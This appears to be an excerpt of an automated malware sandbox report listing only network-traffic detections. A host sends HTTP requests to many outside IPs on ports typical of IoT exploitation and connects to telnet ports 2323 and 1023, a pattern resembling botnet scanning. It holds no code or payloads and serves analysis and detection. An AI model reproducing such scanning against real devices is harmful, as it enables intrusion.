                            Source: unknownNetwork traffic detected: HTTP traffic on port 55534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51150 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34580 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40914 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58488 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43774 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54530 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41488 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54682 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39918 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34310 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49020 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53840 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47910 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58980 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33444 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53558 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36536 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56948 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35234 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37396 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35016 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43100 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36248 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38884 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46834 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37592 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60142 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48468 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40308 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54776 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54326 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33372 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36430 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58464 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42920 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36680 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39618 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38210 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40260 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47264 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52098 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38550 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40540 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37970 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52048 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44978 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39762 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54634 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33884 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53668 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56222 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42566 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55628 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60572 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58868 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60148 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46420 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35918 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54424 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35524 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53432 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41916 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55396 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60036 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39766 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35814 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42630 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60406 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32896 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45148 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56906 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34408 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37162 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40294 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44398 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49486 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36336 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33408 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46476 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40074 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58920 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43014 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38378 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54464 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44852 -> 8443
                            Source: global trafficTCP traffic: 192.168.2.23:59762 -> 170.13.70.64:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44588 -> 118.114.118.190:81
                            Source: global trafficTCP traffic: 192.168.2.23:48274 -> 65.224.38.249:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46640 -> 34.136.79.41:7574
                            Source: global trafficTCP traffic: 192.168.2.23:43658 -> 101.108.225.47:37215
                            Source: global trafficTCP traffic: 192.168.2.23:54836 -> 142.235.63.140:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48458 -> 100.184.144.114:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42906 -> 84.2.80.57:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50400 -> 216.18.254.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54856 -> 167.151.164.41:7574
                            Source: global trafficTCP traffic: 192.168.2.23:41812 -> 87.116.84.152:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47372 -> 162.33.207.205:52869
                            Source: global trafficTCP traffic: 192.168.2.23:56902 -> 194.213.146.39:52869
                            Source: global trafficTCP traffic: 192.168.2.23:60748 -> 28.144.199.55:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51548 -> 182.98.49.24:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51398 -> 210.181.40.142:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39232 -> 106.44.250.26:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58104 -> 121.136.2.49:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36224 -> 124.74.74.114:8080
                            Source: global trafficTCP traffic: 192.168.2.23:38218 -> 38.122.193.152:8443
                            Source: global trafficTCP traffic: 192.168.2.23:56712 -> 85.78.252.113:81
                            Source: global trafficTCP traffic: 192.168.2.23:41536 -> 26.83.38.216:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57776 -> 35.36.155.170:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53188 -> 118.35.168.154:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39032 -> 134.32.128.235:7574
                            Source: global trafficTCP traffic: 192.168.2.23:50214 -> 125.133.16.27:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44088 -> 158.219.39.254:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52528 -> 5.244.147.234:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58972 -> 79.39.229.25:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59284 -> 31.20.181.48:52869
                            Source: global trafficTCP traffic: 192.168.2.23:35038 -> 61.237.100.81:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33870 -> 48.214.85.13:5555
                            Source: global trafficTCP traffic: 192.168.2.23:45240 -> 161.199.124.145:52869
                            Source: global trafficTCP traffic: 192.168.2.23:41436 -> 190.249.69.106:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54774 -> 204.81.207.188:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42514 -> 142.31.67.244:37215
                            Source: global trafficTCP traffic: 192.168.2.23:38010 -> 221.42.76.51:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44012 -> 79.10.209.34:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46432 -> 203.29.198.208:7574
                            Source: global trafficTCP traffic: 192.168.2.23:43002 -> 120.144.248.245:81
                            Source: global trafficTCP traffic: 192.168.2.23:51378 -> 113.145.142.202:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53212 -> 150.246.65.115:81
                            Source: global trafficTCP traffic: 192.168.2.23:60742 -> 149.241.161.180:37215
                            Source: global trafficTCP traffic: 192.168.2.23:60422 -> 184.96.7.28:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40630 -> 9.109.75.127:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47894 -> 206.142.193.152:7574
                            Source: global trafficTCP traffic: 192.168.2.23:56424 -> 47.30.123.212:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58940 -> 87.120.225.117:5555
                            Source: global trafficTCP traffic: 192.168.2.23:33058 -> 140.81.126.115:8443
                            Source: global trafficTCP traffic: 192.168.2.23:44964 -> 153.95.193.121:5555
                            Source: global trafficTCP traffic: 192.168.2.23:33172 -> 91.53.41.217:81
                            Source: global trafficTCP traffic: 192.168.2.23:38760 -> 18.65.35.200:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55892 -> 31.225.239.95:81
                            Source: global trafficTCP traffic: 192.168.2.23:48218 -> 93.31.4.225:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43226 -> 206.130.7.22:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44030 -> 137.27.133.90:8443
                            Source: global trafficTCP traffic: 192.168.2.23:38550 -> 13.9.189.7:37215
                            Source: global trafficTCP traffic: 192.168.2.23:48516 -> 186.251.44.209:5555
                            Source: global trafficTCP traffic: 192.168.2.23:42356 -> 166.192.145.39:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38568 -> 211.70.46.51:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53920 -> 196.115.212.171:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55502 -> 187.147.83.5:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53384 -> 162.198.43.227:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60138 -> 118.30.132.235:81
                            Source: global trafficTCP traffic: 192.168.2.23:56074 -> 139.77.12.175:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52520 -> 140.9.134.133:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54080 -> 110.142.198.158:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34896 -> 63.44.16.237:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53648 -> 162.83.75.110:81
                            Source: global trafficTCP traffic: 192.168.2.23:58484 -> 141.80.218.97:37215
                            Source: global trafficTCP traffic: 192.168.2.23:41888 -> 62.217.115.182:37215
                            Source: global trafficTCP traffic: 192.168.2.23:45404 -> 50.91.199.9:49152
                            Source: global trafficTCP traffic: 192.168.2.23:41280 -> 215.50.246.23:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55402 -> 89.213.177.170:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42974 -> 90.197.2.27:5555
                            Source: global trafficTCP traffic: 192.168.2.23:50964 -> 23.113.105.209:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46252 -> 9.70.45.227:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43262 -> 113.146.56.79:49152
                            Source: global trafficTCP traffic: 192.168.2.23:42856 -> 108.85.179.160:49152
                            Source: global trafficTCP traffic: 192.168.2.23:33938 -> 202.202.168.64:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60024 -> 195.246.106.194:8443
                            Source: global trafficTCP traffic: 192.168.2.23:37314 -> 47.69.248.12:49152
                            Source: global trafficTCP traffic: 192.168.2.23:54132 -> 42.208.199.211:81
                            Source: global trafficTCP traffic: 192.168.2.23:56900 -> 118.137.245.66:81
                            Source: global trafficTCP traffic: 192.168.2.23:58324 -> 201.200.12.116:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44034 -> 164.98.152.87:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57728 -> 65.131.166.130:49152
                            Source: global trafficTCP traffic: 192.168.2.23:50126 -> 32.170.33.253:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43774 -> 124.13.202.21:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52258 -> 45.27.188.99:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44056 -> 191.251.39.30:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52342 -> 77.93.207.38:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52166 -> 157.149.9.22:5555
                            Source: global trafficTCP traffic: 192.168.2.23:46134 -> 76.51.22.34:5555
                            Source: global trafficTCP traffic: 192.168.2.23:34002 -> 103.159.1.83:81
                            Source: global trafficTCP traffic: 192.168.2.23:57208 -> 119.7.140.192:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33290 -> 214.156.186.64:5555
                            Source: global trafficTCP traffic: 192.168.2.23:57766 -> 26.194.72.229:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47656 -> 30.227.89.81:5555
                            Source: global trafficTCP traffic: 192.168.2.23:40996 -> 207.144.197.158:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45000 -> 3.254.159.181:7574
                            Source: global trafficTCP traffic: 192.168.2.23:47902 -> 215.149.25.71:37215
                            Source: global trafficTCP traffic: 192.168.2.23:41384 -> 85.146.86.114:81
                            Source: global trafficTCP traffic: 192.168.2.23:37224 -> 106.176.156.149:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50500 -> 215.47.78.226:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53088 -> 169.80.247.56:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36122 -> 214.127.32.13:81
                            Source: global trafficTCP traffic: 192.168.2.23:56578 -> 65.143.55.175:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34192 -> 121.19.25.76:49152
                            Source: global trafficTCP traffic: 192.168.2.23:51812 -> 80.42.221.252:8443
                            Source: global trafficTCP traffic: 192.168.2.23:48258 -> 51.217.212.91:52869
                            Source: global trafficTCP traffic: 192.168.2.23:46434 -> 183.37.186.197:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37622 -> 92.121.62.166:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39770 -> 182.89.16.0:8443
                            Source: global trafficTCP traffic: 192.168.2.23:39032 -> 61.2.36.48:52869
                            Source: global trafficTCP traffic: 192.168.2.23:57932 -> 101.125.216.151:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50214 -> 20.133.24.145:81
                            Source: global trafficTCP traffic: 192.168.2.23:54190 -> 131.214.104.215:7574
                            Source: global trafficTCP traffic: 192.168.2.23:35932 -> 69.74.133.144:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40216 -> 92.35.9.7:37215
                            Source: global trafficTCP traffic: 192.168.2.23:51804 -> 193.245.80.68:52869
                            Source: global trafficTCP traffic: 192.168.2.23:57396 -> 66.186.235.199:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57064 -> 158.123.170.118:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41712 -> 180.236.218.223:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51422 -> 177.60.56.110:5555
                            Source: global trafficTCP traffic: 192.168.2.23:36522 -> 91.41.16.118:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51066 -> 73.124.161.55:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54874 -> 217.238.86.73:52869
                            Source: global trafficTCP traffic: 192.168.2.23:44164 -> 131.95.252.218:52869
                            Source: global trafficTCP traffic: 192.168.2.23:38868 -> 141.202.115.162:7574
                            Source: global trafficTCP traffic: 192.168.2.23:40430 -> 214.6.88.200:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46876 -> 190.202.109.241:7574
                            Source: global trafficTCP traffic: 192.168.2.23:41886 -> 60.131.7.118:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56378 -> 3.26.211.195:8443
                            Source: global trafficTCP traffic: 192.168.2.23:39970 -> 217.176.190.109:49152
                            Source: global trafficTCP traffic: 192.168.2.23:37956 -> 90.24.179.163:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42338 -> 72.93.110.172:37215
                            Source: global trafficTCP traffic: 192.168.2.23:33526 -> 81.109.6.200:5555
                            Source: global trafficTCP traffic: 192.168.2.23:41538 -> 15.157.152.64:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42464 -> 207.207.172.96:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36258 -> 170.243.90.64:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56236 -> 131.43.106.19:8443
                            Source: global trafficTCP traffic: 192.168.2.23:46270 -> 76.227.143.215:49152
                            Source: global trafficTCP traffic: 192.168.2.23:45140 -> 124.39.196.18:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51682 -> 54.78.250.89:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59228 -> 123.175.241.125:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49554 -> 179.171.182.119:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33418 -> 167.126.69.248:37215
                            Source: global trafficTCP traffic: 192.168.2.23:35372 -> 170.59.144.179:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50582 -> 24.112.229.127:8443
                            Source: global trafficTCP traffic: 192.168.2.23:44166 -> 166.117.94.49:7574
                            Source: global trafficTCP traffic: 192.168.2.23:42466 -> 82.213.155.86:8080
                            Source: global trafficTCP traffic: 192.168.2.23:32906 -> 9.61.172.208:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42120 -> 92.244.233.206:8080
                            Source: global trafficTCP traffic: 192.168.2.23:38328 -> 187.114.160.162:7574
                            Source: global trafficTCP traffic: 192.168.2.23:42974 -> 179.30.194.108:52869
                            Source: global trafficTCP traffic: 192.168.2.23:37372 -> 71.180.206.139:81
                            Source: global trafficTCP traffic: 192.168.2.23:39006 -> 22.236.52.239:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33314 -> 153.28.27.68:8080
                            Source: global trafficTCP traffic: 192.168.2.23:32878 -> 165.20.215.204:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60168 -> 102.24.3.252:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59740 -> 56.225.44.220:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49316 -> 4.134.245.148:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49726 -> 73.24.73.232:7574
                            Source: global trafficTCP traffic: 192.168.2.23:55636 -> 117.31.40.208:5555
                            Source: global trafficTCP traffic: 192.168.2.23:43142 -> 65.169.142.243:8443
                            Source: global trafficTCP traffic: 192.168.2.23:37428 -> 207.34.109.67:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40054 -> 161.199.60.203:5555
                            Source: global trafficTCP traffic: 192.168.2.23:49894 -> 44.223.1.134:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44314 -> 173.120.168.239:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54906 -> 196.89.133.22:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40896 -> 186.182.149.110:7574
                            Source: global trafficTCP traffic: 192.168.2.23:33286 -> 43.107.215.199:49152
                            Source: global trafficTCP traffic: 192.168.2.23:50734 -> 80.52.213.9:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40994 -> 134.220.93.111:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59632 -> 196.150.108.122:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53756 -> 218.248.31.238:8443
                            Source: global trafficTCP traffic: 192.168.2.23:33718 -> 104.26.240.22:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44534 -> 39.106.254.70:7574
                            Source: global trafficTCP traffic: 192.168.2.23:55572 -> 210.164.84.185:49152
                            Source: global trafficTCP traffic: 192.168.2.23:52678 -> 78.160.226.219:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46306 -> 167.83.233.35:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44502 -> 218.232.108.182:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46714 -> 12.69.195.226:7574
                            Source: global trafficTCP traffic: 192.168.2.23:37644 -> 206.139.158.36:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37622 -> 74.94.9.126:52869
                            Source: global trafficTCP traffic: 192.168.2.23:52410 -> 8.202.67.229:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36822 -> 79.79.71.152:52869
                            Source: global trafficTCP traffic: 192.168.2.23:45250 -> 45.22.47.103:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53022 -> 117.238.33.98:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47802 -> 15.233.37.150:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38360 -> 140.124.226.188:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58292 -> 34.184.126.212:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53804 -> 5.143.69.122:8443
                            Source: global trafficTCP traffic: 192.168.2.23:43102 -> 73.249.134.188:5555
                            Source: global trafficTCP traffic: 192.168.2.23:46238 -> 174.204.37.155:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54658 -> 162.35.226.90:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36786 -> 114.214.178.160:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33050 -> 53.31.107.240:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44416 -> 113.8.22.97:52869
                            Source: global trafficTCP traffic: 192.168.2.23:55112 -> 17.238.190.54:37215
                            Source: global trafficTCP traffic: 192.168.2.23:54226 -> 42.186.151.84:52869
                            Source: global trafficTCP traffic: 192.168.2.23:43338 -> 53.188.136.82:37215
                            Source: global trafficTCP traffic: 192.168.2.23:45340 -> 110.161.89.185:5555
                            Source: global trafficTCP traffic: 192.168.2.23:60746 -> 36.77.84.33:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34276 -> 95.176.250.113:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55062 -> 37.215.196.232:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36032 -> 97.164.5.45:37215
                            Source: global trafficTCP traffic: 192.168.2.23:60512 -> 103.113.64.117:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57916 -> 89.177.177.66:81
                            Source: global trafficTCP traffic: 192.168.2.23:42984 -> 6.237.128.43:8443
                            Source: global trafficTCP traffic: 192.168.2.23:47362 -> 93.52.53.0:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58704 -> 134.145.254.175:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53736 -> 61.236.10.24:7574
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 154.188.72.149:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 124.46.88.42:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 119.75.28.81:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 183.110.244.6:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 73.184.60.91:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 194.10.212.237:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 92.8.54.109:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 124.162.133.167:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 82.148.247.0:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 105.1.160.171:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 62.234.145.232:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 142.168.146.217:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 103.206.41.98:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 135.115.123.97:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 18.85.250.217:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 194.87.190.93:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 14.195.80.60:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 83.45.30.251:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 82.105.60.153:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 63.120.191.2:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 184.246.61.202:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 2.204.134.248:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 68.178.207.183:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 196.184.148.135:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 186.68.35.207:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 168.84.118.105:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 117.191.154.186:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 160.43.134.182:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 67.7.133.61:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 68.150.124.87:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 12.160.78.18:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 220.92.116.3:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 157.21.122.103:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 183.62.206.109:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 108.31.129.249:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 209.2.90.250:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 115.197.144.134:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 12.81.120.203:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 2.181.158.209:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 159.47.201.145:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 152.87.185.58:2323
